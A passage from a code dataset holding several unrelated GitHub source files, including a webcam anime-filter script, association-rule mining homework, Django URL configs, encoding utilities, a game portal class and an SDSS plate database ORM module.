print(\"Using webcam\")\n\n ret, frame = vid.read()\n\n return frame\n\n\ndef frame_from_screen_cap(x, y, width, height):\n\n # # Screen capture.\n with mss() as sct:\n monitor = {\n \"top\": int(x),\n \"left\": int(y),\n \"width\": int(width),\n \"height\": int(height),\n }\n frame = np.array(sct.grab(monitor))\n # Remove the alpha channel.\n frame = frame[:, :, :3]\n 
return frame\n\n\ndef calculate_fps():\n global frame_counter, last_time\n\n try:\n frame_counter\n\n except NameError:\n frame_counter = 0\n last_time = time.time()\n\n frame_counter += 1\n if frame_counter % 10 == 0:\n\n print(\"fps: \", frame_counter / (time.time() - last_time))\n frame_counter = 0\n last_time = time.time()\n\n\ndef dump_frame_to_obs_virtual_cam(frame):\n global virtual_cam\n\n height, width, layers = frame.shape\n\n # Make the webcam be bigger.\n width = width * 2\n height = height * 2\n\n try:\n virtual_cam\n except NameError:\n\n print(\"Make sure you're running OBS!\")\n\n virtual_cam = pyvirtualcam.Camera(width=width, height=height, fps=30)\n print(f\"Using virtual camera: {virtual_cam.device}\")\n\n updated_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n updated_frame = cv2.resize(updated_frame, (height, width))\n\n virtual_cam.send(updated_frame)\n virtual_cam.sleep_until_next_frame()\n\n\ndef cleanup(signum=None, frame=None):\n \"\"\"\n Cleanup when we send C-c\n \"\"\"\n\n try:\n virtual_cam.close()\n except:\n pass\n vid.release()\n cv2.destroyAllWindows()\n print(\"Cleanup complete\")\n\n\ndef scale_frame_to_width(frame, new_width, interpolation=cv2.INTER_NEAREST):\n height, width, layers = frame.shape\n\n aspect_ratio = float(width) / height\n\n new_height = int(new_width / aspect_ratio)\n return cv2.resize(frame, (new_width, new_height), interpolation=interpolation)\n\n\nsignal.signal(signal.SIGINT, cleanup)\n\nwhile True:\n\n calculate_fps()\n\n # Capture the video frame by frame\n\n frame = frame_from_web_cam()\n # frame = frame_from_screen_cap(0, 0, 1024, 1400)\n # frame = frame_from_video(\"c:/Users/Brian/Downloads/foo.mp4\")\n\n frame = crop_face(frame)\n\n frame = anime_gan.anime(frame)\n\n # frame = pixelate(frame)\n frame = scale_frame_to_width(frame, 1000)\n\n # dump_frame_to_obs_virtual_cam(frame)\n # write_frame_to_video(frame, \"c:/Users/Brian/Downloads/out.avi\")\n\n cv2.imshow(\"frame\", frame)\n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n break\n\n\ncleanup()\n","repo_name":"brian-dawn/anime-gan-v2-playground","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36577154837","text":"import os\n\nimport numpy as np\nimport pandas as pd\nfrom mlxtend.frequent_patterns import apriori, association_rules, fpgrowth\n\n#directory name of the output file\ndirname = 'output'\n\n\"\"\" Answer to Question 1 \"\"\"\n \n#read the csv file\ndata = pd.read_csv('./specs/gpa_question1.csv')\n\n#Filter out the count attribute\ndata.pop('count')\n\n#convert the data set into the form that is required by the apriori algorithm\ndummies_out = pd.get_dummies(data)\n\n\n# using apriori algorithm calculate the frequent itemset using minimum support as 15%\n# use_colnames attribute in apriori will use the same columns in frequent dataset output as in input dataset.\nfrequent_itemset = apriori(dummies_out, min_support=0.15,use_colnames=True)\n\n\n# check if the output folder is present, if not create output folder\nif not os.path.exists(dirname):\n os.mkdir(dirname)\n\n#write the output to output file\nfrequent_itemset.to_csv('./output/question1_out_apriori.csv',index=False)\n\n\n# calculate the association rules based on confidence.\n#confidence is set to 90%\nrules_9 = association_rules(frequent_itemset, metric=\"confidence\", min_threshold=0.9)\n\nrules_9.to_csv('./output/question1_out_rules9.csv',index=False)\n\n# confidence 
is set to 70%\nrules_7 = association_rules(frequent_itemset, metric=\"confidence\", min_threshold=0.7)\n\nrules_7.to_csv('./output/question1_out_rules7.csv',index=False)\n\n\n\n\"\"\" Answer to Question 2 \"\"\"\n\n#read the csv file\ndata_2 = pd.read_csv('./specs/bank_data_question2.csv')\n\n# filter out the id attribute\ndata_2.pop('id')\n\n# only get those columns that contain numeric data.\nnumeric_data = data_2._get_numeric_data()\n\n# initialize a new dataframe\ndata_1 = pd.DataFrame()\n\n# use the pandas cut method to discretise the numeric data into equal-width bins\nfor i in numeric_data:\n    data_1[i] = pd.cut(numeric_data[i],3)\n\n# update the original dataframe to contain the discretised data after binning\ndata_2.update(data_1,overwrite=True)\n\n# convert the data into the form required by the fpgrowth algorithm.\ndummies_out = pd.get_dummies(data_2)\n\n# apply the FP-growth algorithm to calculate the frequent itemsets.\noutput = fpgrowth(dummies_out, min_support=0.2,use_colnames=True)\n\noutput.to_csv('./output/question2_out_fpgrowth.csv',index = False)\n\n# calculate the association rules\n# 70% is the confidence threshold at which at least 10 rules are generated.\nrules = association_rules(output, metric=\"confidence\", min_threshold=0.70)\n\nrules.to_csv('./output/question2_out_rules.csv',index=False)","repo_name":"akshaymodi9/data-mining","sub_path":"practicals/practical_3_ASSOCIATION/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"28705770921","text":"from django.conf.urls.defaults import patterns, include, url\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\nhandler404 = 'trainingApp.errors.error404'\nhandler500 = 'trainingApp.errors.error500'\n\nurlpatterns = patterns('',\n    # Examples:\n    # url(r'^$', 'trainingProject.views.home', name='home'),\n    # url(r'^trainingProject/', include('trainingProject.foo.urls')),\n\n    # Uncomment the admin/doc line below to enable admin documentation:\n    url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n    # Uncomment the next line to enable the admin:\n    url(r'^admin/', include(admin.site.urls)),\n)\n\nurlpatterns += patterns('trainingApp.views',\n    url(r'^$', 'posts', name=\"pageHome\"),\n    url(r'^posts/$', 'posts', name=\"pagePosts\"),\n    url(r'^post/(?P[\\w-]+).html$', 'post', name=\"pagePost\"),\n    url(r'^category/(?P[\\w-]+).html$', 'category', name=\"pageCategory\"),\n    url(r'^profile/(?P[\\w-]+).html$', 'profile', name=\"pageProfile\"),\n    url(r'^settings/$', 'settings', name=\"pageSettings\"),\n    url(r'^signUp/$', 'signUp', name=\"pageSignUp\"),\n    url(r'^signIn/$', 'signIn', name=\"pageSignIn\"),\n    url(r'^signOut/$', 'signOut', name=\"pageSignOut\"),\n    url(r'^post/add/$', 'postAdd', name=\"pagePostAdd\"),\n    url(r'^category/add/$', 'categoryAdd', name=\"pageCategoryAdd\"),\n    url(r'^comment/add/(?P[\\w-]+).html$', 'commentAdd', name=\"pageCommentAdd\"),\n    url(r'^deleteAccount/$', 'deleteAccount', name=\"pageDeleteAccount\"),\n    url(r'^confirmMail/(?P\\w+)$', 'confirmMail', name=\"pageConfirmMail\"),\n    url(r'^confirmCommentWithMail/(?P\\w+)/(?P\\w+)/(?P\\w+)$',\n        'confirmCommentWithMail', name='pageConfirmCommentWithMail'),\n)\n\nurlpatterns += static(settings.MEDIA_URL, 
document_root=settings.MEDIA_ROOT)","repo_name":"berkantaydin/trainingProject","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"9734083398","text":"import hashlib\nimport html\nimport json\nimport urllib.parse\nimport base64\n\nimport requests\nfrom django.db.models import ManyToManyField, DateField, TimeField, DateTimeField\n\n\n\nclass toDictRoot:\n    '''\n    Base class that converts a model instance to a dict\n    '''\n    def toDICT(self, fields=None, exclude=None):\n        data = {}\n        for f in self._meta.concrete_fields + self._meta.many_to_many:\n            value = f.value_from_object(self)\n            if fields and f.name not in fields:\n                continue\n            if exclude and f.name in exclude:\n                continue\n            if isinstance(f, ManyToManyField):\n                value = [i.id for i in value] if self.pk else None\n\n            if isinstance(f, DateTimeField):\n                value = value.strftime('%Y-%m-%d %H:%M:%S.%f') if value else None\n            elif isinstance(f, TimeField):\n                value = value.strftime('%H:%M:%S.%f') if value else None\n            elif isinstance(f, DateField):\n                value = value.strftime('%Y-%m-%d') if value else None\n\n            data[f.name] = value\n        return data\n\n    def toJSON(self, fields=None, exclude=None):\n        return json.dumps(self.toDICT(fields=fields, exclude=exclude), separators=(',', ':'))\n\n\ndef send_msg(phone, msg, url):\n    '''\n    Send an SMS message\n    :param phone: phone number\n    :param msg: message content\n    :param url: SMS gateway URL\n    :return:\n    '''\n    try:\n        msg = urlencode(msg)\n        url = url.format(phone, msg)\n        res = requests.get(url)\n        json_response = json.loads(res.content)\n        # set the verification code\n        if json_response.get('result') == 'success':\n            return True\n        else:\n            return False\n    except Exception as e:\n        raise\n\n\ndef sort_dict_to_list(data):\n    '''\n    Sort a dictionary alphabetically by key\n    :param data:\n    :return: a list of (key, value) tuples\n    '''\n    if data is None or len(data)==0:\n        raise ValueError\n\n    if not isinstance(data, dict):\n        raise TypeError\n\n    complex_keys = [k for k, v in data.items() if isinstance(v, dict)]\n\n    # dump dict-typed values to JSON strings\n    for key in complex_keys:\n        data[key] = json.dumps(data[key], separators=(',', ':'))\n\n    return sorted([(k, v) for k, v in data.items()])\n\n\ndef md5_hexdigest(encry=None, upper=False):\n    '''\n    32-character hexadecimal MD5 digest\n    :param encry: the string to hash\n    :param upper: whether to return the digest in uppercase\n    :return:\n    '''\n    if encry is None:\n        raise ValueError\n\n    if not isinstance(encry, str):\n        raise TypeError\n\n    m = hashlib.md5(encry.encode(encoding='utf-8'))\n    if not upper:\n        return m.hexdigest()\n    else:\n        return m.hexdigest().upper()\n\n\ndef md5_digest(encry=None):\n    '''\n    16-byte binary MD5 digest\n    :param encry: the string to hash\n    :return:\n    '''\n    if encry is None:\n        raise ValueError\n\n    if not isinstance(encry, str):\n        raise TypeError\n\n    m = hashlib.md5(encry.encode(encoding='utf-8'))\n    # return the raw 16-byte digest; it is generally not valid UTF-8, so it must not be decoded\n    return m.digest()\n\n\ndef xor_decrypt(tips, key='9'):\n    '''\n    XOR decryption\n    :param tips: ciphertext\n    :param key: secret key\n    :return:\n    '''\n    lkey = len(key)\n    secret = []\n    num = 0\n    for each in tips:\n        if num >= lkey:\n            num = num % lkey\n        secret.append(ord(chr(ord(each) ^ ord(key[num]))))\n        num += 1\n    result = ''.join([str(i) for i in secret])\n    return result\n\n\ndef urldecode(b):\n    '''\n    URL-decode\n    :param b:\n    :return:\n    '''\n    if b is None:\n        raise ValueError\n\n    if not isinstance(b, bytes):\n        raise TypeError\n\n    # unquote() expects str in Python 3, so decode the bytes first\n    data = urllib.parse.unquote(b.decode('utf-8'))\n    return data\n\n\ndef urlencode(s):\n    '''\n    URL-encode\n    :param s:\n    :return:\n    '''\n    if s is None:\n        raise ValueError\n\n    if type(s) not in [str, bytes]:\n        raise TypeError\n    data = urllib.parse.quote(s)\n    return data\n\n\ndef base64encode(b):\n    
'''\n    base64-encode\n    :param b:\n    :return:\n    '''\n    if b is None:\n        raise ValueError\n\n    if not isinstance(b, bytes):\n        raise TypeError\n\n    return base64.b64encode(b)\n\n\ndef base64decode(s):\n    '''\n    base64-decode\n    :param s:\n    :return:\n    '''\n    if s is None:\n        raise ValueError\n\n    if type(s) not in [str, bytes]:\n        raise TypeError\n\n    s = str(base64.urlsafe_b64decode(s), encoding='utf8')\n    s = html.unescape(s)  # unescape HTML entities\n    return s\n\n\n\n","repo_name":"wucong1994/Desktop","sub_path":"desktopfile/snowland_sdk/encode_encrypt.py","file_name":"encode_encrypt.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"72101358187","text":"\"\"\"\nGiven a binary tree, find its minimum depth.\nThe minimum depth is the number of nodes along the shortest path from the root node down 
to the nearest leaf node.\nNote: A leaf is a node with no children.\n\"\"\"\n\nfrom typing import Optional\nfrom typing import List\nfrom collections import deque\n\nclass TreeNode:\n    def __init__(self, val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\n\nclass Solution:\n    def minDepth(self, root: Optional[TreeNode]) -> int:\n        if not root:\n            return 0\n        count = 0\n        queue = deque()\n        \n        queue.append(root)\n\n        while queue:\n            level_size = len(queue)\n            count += 1\n            for i in range(level_size):\n                curr = queue.popleft()\n                if not curr.left and not curr.right:\n                    return count\n                \n                if curr.left:\n                    queue.append(curr.left)\n                if curr.right:\n                    queue.append(curr.right)\n        return count\n\n\nnode1 = TreeNode(3)\nnode2 = TreeNode(9)\nnode3 = TreeNode(20)\nnode4 = TreeNode(15)\nnode5 = TreeNode(7)\n\nnode1.left = node2\nnode1.right = node3\nnode3.left = node4\nnode3.right = node5\n\n# node1 = TreeNode(-9)\n# node2 = TreeNode()\n\ns = Solution()\nresult = s.minDepth(node1)\nprint(\"result: {}\".format(result))","repo_name":"davidyoon891122/LeetCode","sub_path":"MinimumDepthOfBinaryTree/minimum_depth_of_binary_tree_bfs.py","file_name":"minimum_depth_of_binary_tree_bfs.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"27167416478","text":"from nano_grad.engine.tensor import Tensor\nfrom nano_grad.engine.matrix import Matrix\nimport numpy as np\n\ndef ReLU(x):\n    for i in range(x.shape[0]):\n        for j in range(x.shape[1]):\n            x.data[i][j]=x.data[i][j].relu()\n    return x\n\n# e_x = np.exp(x - np.max(x))\n# softmax = e_x / e_x.sum()\n# log_softmax = np.log(softmax)\ndef Softmax(x):\n    prob=[]\n    averaged=x-Matrix.max(x)\n    e_x=Matrix.exp(averaged)\n    summed__e_x= Matrix.sum(e_x)\n    softmax=e_x / summed__e_x\n    return softmax","repo_name":"mrbraden56/NanoGrad","sub_path":"nano_grad/nn/activation.py","file_name":"activation.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}{"seq_id":"6649465682","text":"import fuzzy\nfrom num2words import num2words\n\n\ndmeta = fuzzy.DMetaphone()\n\n\ndef s_phonetic(word):\n    \"\"\"\n    Compute a phonetic (Double Metaphone) code for a word, performing some cleansing\n    \"\"\"\n    word = word.strip()\n    if word.isnumeric():\n        word = num2words(word)\n    return dmeta(word)\n\n\ndef wcmp(a, b):\n    return s_phonetic(a) == s_phonetic(b)\n\n\ndef wil(word, lst):\n    \"\"\"\n    Check if a word is found in a list\n\n    :param word: The word to check\n    :param lst: The list to check\n    :returns: Boolean\n    \"\"\"\n    w = s_phonetic(word)\n    for i in lst:\n        if w == s_phonetic(i):\n            return True\n\n    return False\n\n\ndef wis(word, sentence):\n    \"\"\"\n    Check if a word is found in a string\n\n    :param word: The word to check\n    :param sentence: The sentence to check\n    :returns: Boolean\n    \"\"\"\n    w = s_phonetic(word)\n    for i in sentence.split(' '):\n        if w == s_phonetic(i):\n            return True\n\n    return False\n\n\ndef awis(words, sentence):\n    \"\"\"\n    Check if any of the words is found in a sentence\n\n    :param words: The words to check\n    :param sentence: The sentence to check\n    :returns: Boolean\n    \"\"\"\n    ws = []\n    for word in words:\n        ws.append(s_phonetic(word))\n\n    for i in sentence.split(' '):\n        if s_phonetic(i) in ws:\n            return True\n\n    return False\n\n\ndef cwis(words, sentence):\n    \"\"\"\n    Count how many of the words are found in a sentence\n\n    :param words: The words to check\n    :param sentence: The 
sentence to check\n :returns: Count of matches\n \"\"\"\n ws = []\n for word in words:\n ws.append(s_phonetic(word))\n\n count = 0\n # pad \".\" with extra spaces, so it's considered\n sentence = sentence.replace('.', ' . ')\n for i in sentence.split(' '):\n if s_phonetic(i) in ws:\n count += 1\n\n return count\n","repo_name":"JaykeMeijer/jarvis","sub_path":"listen/phonetics.py","file_name":"phonetics.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21914435520","text":"from picowork.pspriteobject import *\nfrom picowork.psprite import *\nfrom picowork.pinput import *\nfrom worldobject import *\n\nclass Portal(WorldObject):\n sprites = None\n\n def __init__(self, tile_map, portal_callback):\n super().__init__(tile_map)\n self.collision_tag = 'portal'\n self.collision_bounds = (-0.5, -0.25, 0.5, 0.75)\n\n if Portal.sprites is None:\n image = get_image('portal_stripes3.png')\n Portal.sprites = [PSprite(image, (i % 2) * 512, (i // 2) * 512, 512, 512) for i in range(4)]\n\n self.visual = PSpriteObject(Portal.sprites[2])\n self.visual.set_position(Vector2(0, 0.25))\n self.visual.set_scale(Vector2(0.1, 0.1))\n self.add_element(self.visual)\n\n self.indicator = PSpriteObject('thin_btn_up.png')\n self.indicator.set_position(Vector2(0, 1.2))\n self.indicator.set_scale(Vector2(1, 0))\n self.add_element(self.indicator)\n\n self.portal_callback = portal_callback\n self.near = False\n\n def update(self, delta_time):\n super().update(delta_time)\n\n self.visual.set_rotation(self.time * -360)\n self.indicator.set_position(Vector2(0, sin(self.time * 10) * 0.05 + 1.2))\n\n near = len(self.get_parent().get_collision_objects_from_object('player', self)) > 0\n if near and not self.near:\n self.indicator.set_scale(Vector2(1, 2))\n self.indicator.set_scale(lerp(self.indicator.get_scale(), Vector2(1, 1) if near else Vector2(1, 0), delta_time * 24))\n if near and get_keydown(SDLK_w):\n sound = get_sound('Psychic_Soothe_Pulser_01a.wav')\n sound.set_volume(50)\n sound.play()\n self.portal_callback()\n self.near = near\n","repo_name":"Yupdown/2DGameProgramming","sub_path":"source/portal.py","file_name":"portal.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12365347247","text":"arr = [2,23,43,22,100,108,554,556]\nn = 108\nc = 0\nfor i in arr:\n if (i == n):\n print (\" This algorithm ran the loop for \", c ,\" times before finding the element in the array size of \", len(arr))\n break\n c+=1\n\n\n \n","repo_name":"sivasrlingala/CodingPrograms","sub_path":"linearsearch.py","file_name":"linearsearch.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4701919132","text":"from django.urls import path\nfrom .views import(\n PostListView,\n PostDetailView,\n PostCreateView,\n PostDeleteView,\n PostUpdateView\n)\nfrom django.conf.urls.static import static\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom . 
import views\n# from django.conf import settings\n\n\nurlpatterns = [\n    path('',PostListView.as_view() , name=\"post_list\"),\n    path('<int:pk>/', PostDetailView.as_view(), name=\"post_detail\"),\n    path('new/', PostCreateView.as_view(), name=\"post_new\"),\n    path('<int:pk>/delete/', PostDeleteView.as_view(), name=\"post_delete\"),\n    path('<int:pk>/edit/', PostUpdateView.as_view(), name=\"post_edit\"),\n\n]","repo_name":"Carlos-Castellanos/blog113","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"13092599418","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# @Author: Demitri Muna\n# @Filename: platedb.py\n# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)\n\nimport datetime\nimport math\nimport warnings\nfrom decimal import Decimal\nfrom textwrap import TextWrapper\n\nimport sqlalchemy\nfrom sqlalchemy import func\nfrom sqlalchemy.ext.declarative import AbstractConcreteBase, declared_attr\nfrom sqlalchemy.orm import relation\nfrom sqlalchemy.orm.exc import MultipleResultsFound, NoResultFound\nfrom sqlalchemy.orm.session import Session\n\nfrom sdssdb.sqlalchemy.operationsdb import OperationsBase, database\n\nfrom .tools import convert\nfrom .tools.moon import Moon\n\n\napo_lat = 32.7802778  # Latitude at APO\napo_lon = 105.820278  # Longitude at APO\n\n\nwarnings.filterwarnings('ignore', '.*Skipped unsupported reflection.*')\nwarnings.filterwarnings('ignore', '.*Did not recognize type*')\n\n\nclass Base(AbstractConcreteBase, OperationsBase):\n    __abstract__ = True\n    _schema = 'platedb'\n    _relations = 'define_relations'\n\n    @declared_attr\n    def __table_args__(cls):\n        return {'schema': cls._schema}\n\n\nclass PluggingException(Exception):\n    \"\"\"Custom class for plugging exceptions. 
Adds contact information.\"\"\"\n\n def __init__(self, message, *args):\n\n tw = TextWrapper()\n tw.width = 79\n tw.subsequent_indent = ''\n tw.break_on_hyphens = False\n\n # Adds custom error\n message += '\\n\\n'\n message += '*' * 79 + '\\n'\n\n addenda = ('If you are not sure of how to solve this problem '\n 'please copy this error message and email to Jose '\n 'Sanchez-Gallego and Drew '\n 'Chojnowski and CC Demitri Muna '\n ' and John Parejko '\n '.\\n')\n addenda = '\\n'.join(tw.wrap(addenda))\n message += addenda + '\\n'\n\n message += '*' * 79 + '\\n'\n\n super(PluggingException, self).__init__(message)\n\n\nclass ActivePluggingException(PluggingException):\n \"\"\"Custom class for problems with Active Pluggings.\"\"\"\n\n pass\n\n\nclass Cartridge(Base):\n\n __tablename__ = 'cartridge'\n\n def __repr__(self):\n return '' % self.number\n\n\nclass Constants(Base):\n\n __tablename__ = 'constants'\n\n def __repr__(self):\n return ''\n\n\nclass Gprobe(Base):\n\n __tablename__ = 'gprobe'\n\n def __repr__(self):\n return f''\n\n\nclass Plugging(Base):\n\n __tablename__ = 'plugging'\n\n def __repr__(self):\n return f''\n\n @property\n def fscan_datetime(self):\n return convert.mjd2datetime(self.fscan_mjd)\n\n def scienceExposures(self):\n session = Session.object_session(self)\n return session.query(Exposure).join(Observation, ExposureFlavor).filter(\n Observation.plugging_pk == self.pk).filter(\n ExposureFlavor.label == 'Science').all()\n\n def getSumSn2(self, cameras=None):\n session = Session.object_session(self)\n if cameras is None:\n cameras = ['r1', 'r2', 'b1', 'b2']\n exposures = session.query(Exposure).join(Observation).filter(\n Observation.plugging == self).all()\n SumSn2 = [0, 0, 0, 0]\n for i, camName in enumerate(cameras):\n camera = session.query(Camera).filter_by(label=camName).one()\n for exposure in exposures:\n cframe = session.query(CameraFrame).filter_by(\n exposure=exposure).filter_by(\n camera=camera).one()\n if cframe.sn2 > 0.2:\n SumSn2[i] = SumSn2[i] + cframe.sn2\n return SumSn2\n\n def percentDone(self):\n if len(self.activePlugging) > 0:\n session = Session.object_session(self)\n\n # Refresh observations to ensure they are in sync with DB\n r1_sum = float(sum([obs.sumOfCamera('r1') for obs in self.observations]))\n r2_sum = float(sum([obs.sumOfCamera('r2') for obs in self.observations]))\n b1_sum = float(sum([obs.sumOfCamera('b1') for obs in self.observations]))\n b2_sum = float(sum([obs.sumOfCamera('b2') for obs in self.observations]))\n\n min_r_percent = min([r1_sum, r2_sum]) / float(\n session.query(BossSN2Threshold).join(Camera).filter(\n Camera.label == 'r1').one().sn2_threshold) * 100.0\n min_b_percent = min([b1_sum, b2_sum]) / float(\n session.query(BossSN2Threshold).join(Camera).filter(\n Camera.label == 'b1').one().sn2_threshold) * 100.0\n\n percent_done = min([min_r_percent, min_b_percent])\n\n if percent_done > 100.0:\n percent_done = 100.0\n\n return percent_done\n else:\n return 0\n\n def updateStatus(self):\n session = Session.object_session(self)\n\n cameras = ['r1', 'r2', 'b1', 'b2']\n\n exposureExcellent = 1\n # exposureBad = 2\n # exposureTest = 3\n # exposureText = ['', 'Excellent', 'Bad', 'Test']\n\n # flagAuto = session.query(PluggingStatus).filter_by(pk=0).one()\n flagGood = session.query(PluggingStatus).filter_by(pk=1).one()\n flagIncomplete = session.query(PluggingStatus).filter_by(pk=2).one()\n flagOverGood = session.query(PluggingStatus).filter_by(pk=3).one()\n flagOverIncomplete = 
session.query(PluggingStatus).filter_by(pk=4).one()\n\n # If plugging status is overwritten, nothing for us to calculate\n if self.status == flagOverGood or self.status == flagOverIncomplete:\n return 0\n\n exposures = session.query(Exposure).join(Observation).filter(\n Observation.plugging == self).all()\n\n for camName in cameras:\n try:\n camera = session.query(Camera).filter_by(label=camName).one()\n sn2Thresh = session.query(BossSN2Threshold).filter_by(camera=camera).one()\n\n sumsn2 = 0.0\n goodExposures = 0\n for exposure in exposures:\n if exposure.status.pk != exposureExcellent:\n continue\n else:\n goodExposures += 1\n\n try:\n cframe = session.query(CameraFrame).filter_by(\n exposure=exposure).filter_by(camera=camera).one()\n\n sn2 = cframe.sn2\n if sn2 > sn2Thresh.sn2_min:\n sumsn2 += float(sn2)\n except sqlalchemy.orm.exc.MultipleResultsFound:\n print('More than one CameraFrame found. '\n 'Expecting only one! \\n\\n')\n raise\n except (sqlalchemy.orm.exc.NoResultFound, KeyError):\n print('!WARNING: Could not get sn2 from platedb')\n pass\n except:\n print('Problem loading CameraFrame \\n\\n')\n raise\n\n # Not enough sn2, plugging is incomplete\n if sumsn2 < float(sn2Thresh.sn2_threshold):\n # Set the plugging status to incomplete\n self.status = flagIncomplete\n session.flush()\n return\n\n # Not enough exposures, plugging is incomplete\n if goodExposures < float(sn2Thresh.min_exposures):\n # Set the plugging status to incomplete\n self.status = flagIncomplete\n session.flush()\n return\n\n except:\n print('Problem calculating sumsn2')\n raise\n\n # Set the plugging status to complete\n self.status = flagGood\n session.flush()\n\n return\n\n def mangaUpdateStatus(self, status):\n \"\"\"Update the plugging status of manga exposures, based on Totoro.\"\"\"\n\n session = Session.object_session(self)\n\n flagGood = session.query(PluggingStatus).filter_by(pk=1).one()\n flagIncomplete = session.query(PluggingStatus).filter_by(pk=2).one()\n\n if status:\n self.status = flagGood\n else:\n self.status = flagIncomplete\n\n def makeActive(self):\n \"\"\"Makes the plugging active.\"\"\"\n\n session = Session.object_session(self)\n\n cartNo = self.cartridge.number\n\n # Checks if the plate has already an active plugging\n platePK = self.plate.pk\n activePluggings = session.query(ActivePlugging).all()\n\n for aP in activePluggings:\n if aP.plugging.plate.pk == platePK and aP.plugging_pk != self.pk:\n warnings.warn(\n 'plate {0} is already loaded in cart {1} with a '\n 'different plugging. Removing previous active '\n 'plugging'.format(self.plate.plate_id,\n aP.plugging.cartridge.number), UserWarning)\n session.delete(aP)\n\n # Checks if the plugging is already active\n try:\n activePlugging = session.query(ActivePlugging).filter(\n ActivePlugging.plugging_pk == self.pk).one()\n except MultipleResultsFound:\n raise ActivePluggingException(\n 'more than one active plugging for plugging pk={0}. '\n 'This should never happen!'.format(self.pk))\n except NoResultFound:\n activePlugging = None\n\n # If plugging is already active, checks the cart number\n if activePlugging is not None:\n if activePlugging.pk != cartNo:\n raise ActivePluggingException(\n 'plugging pk={0} is already active but its cart number '\n 'does not match the one in the plugging ({1}!={2}). This '\n 'should never happen.'.format(self.pk, activePlugging.pk, cartNo))\n\n warnings.warn('plugging pk={0} is already active. 
'\n                          'Not doing anything.'.format(self.pk), UserWarning)\n            return activePlugging\n\n        # Makes the plugging active\n        activePlugging = session.query(ActivePlugging).get(cartNo)\n        if activePlugging is not None:\n            activePlugging.plugging_pk = self.pk\n            session.flush()\n        else:\n            session.add(ActivePlugging(pk=cartNo, plugging_pk=self.pk))\n            session.flush()\n\n        # Check that it worked\n        # Checks if the plugging is already active\n        try:\n            activePlugging = session.query(ActivePlugging).filter(\n                ActivePlugging.plugging_pk == self.pk).one()\n        except NoResultFound:\n            raise ActivePluggingException(\n                'something went wrong when trying to make plugging pk={0} '\n                'active'.format(self.pk))\n\n        return activePlugging\n\n\nclass ActivePlugging(Base):\n\n    __tablename__ = 'active_plugging'\n\n    def __repr__(self):\n        return (f'')\n\n\nclass PlPlugMapM(Base):\n\n    __tablename__ = 'pl_plugmap_m'\n\n    def platePointing(self):\n        # Class method that returns the session this object is in.\n        session = Session.object_session(self)\n        try:\n            pp = session.query(PlatePointing).join(Plate, Plugging).filter(\n                Plate.pk == self.plugging.plate.pk).filter(\n                PlatePointing.pointing_name == self.pointing_name).one()\n        except sqlalchemy.orm.exc.NoResultFound:\n            print(f'A plate pointing for a plugmap (pk={self.pk}) '\n                  f'could not be found (plate id={self.plugging.plate.plate_id}, '\n                  f'pk={self.plugging.plate.pk})')\n            pp = None\n        return pp\n\n    def visibility(self):\n        \"\"\"Retrieves the visibility range for this plate\n        as a map with keys \"ha_observable_min\" and \"ha_observable_max\".\n        Each value is an array of values corresponding to each pointing.\n        \"\"\"\n\n        max_found = False\n        min_found = False\n\n        visibilities = dict()\n\n        # Just loop over every line in the \"file\" until the two keys are found.\n        # They're near the top, so it won't take long.\n        for line in self.file.split('\\n'):\n            if line[0:17] == 'ha_observable_min':\n                min_found = True\n                visibilities['ha_observable_min'] = [float(x) for x in line[17:].split()]\n            elif line[0:17] == 'ha_observable_max':\n                visibilities['ha_observable_max'] = [float(x) for x in line[17:].split()]\n                max_found = True\n\n            if min_found and max_found:\n                break\n\n        return visibilities\n\n    def __repr__(self):\n        return f''\n\n\nclass Plate(Base):\n    __tablename__ = 'plate'\n\n    def __repr__(self):\n        return f''\n\n    def calculatedCompletionStatus(self):\n        \"\"\"Determine whether the plate is done from the pluggings on that plate.\"\"\"\n\n        if True not in ['boss' in survey.label.lower() for survey in self.surveys]:\n            return 'n/a'\n\n        if self.completionStatus.pk == 0:  # pk = 0 -> \"Automatic\"\n            return self._automaticCompletionStatus()\n        else:\n            # If the status is \"Force Complete\" or \"Force Incomplete\",\n            # return that status\n            return self.completionStatus.label\n\n    def _automaticCompletionStatus(self):\n        \"\"\"If the plate completion status were automatic, is it complete or incomplete.\"\"\"\n\n        if True not in ['boss' in survey.label.lower() for survey in self.surveys]:\n            return 'n/a'\n\n        session = Session.object_session(self)\n        plug_statuses = session.query(PluggingStatus.label).join(\n            Plugging, Plate).filter(Plate.plate_id == self.plate_id).all()\n\n        for status in [a[0] for a in plug_statuses]:\n            if 'Good' in status:\n                return 'Complete'\n\n        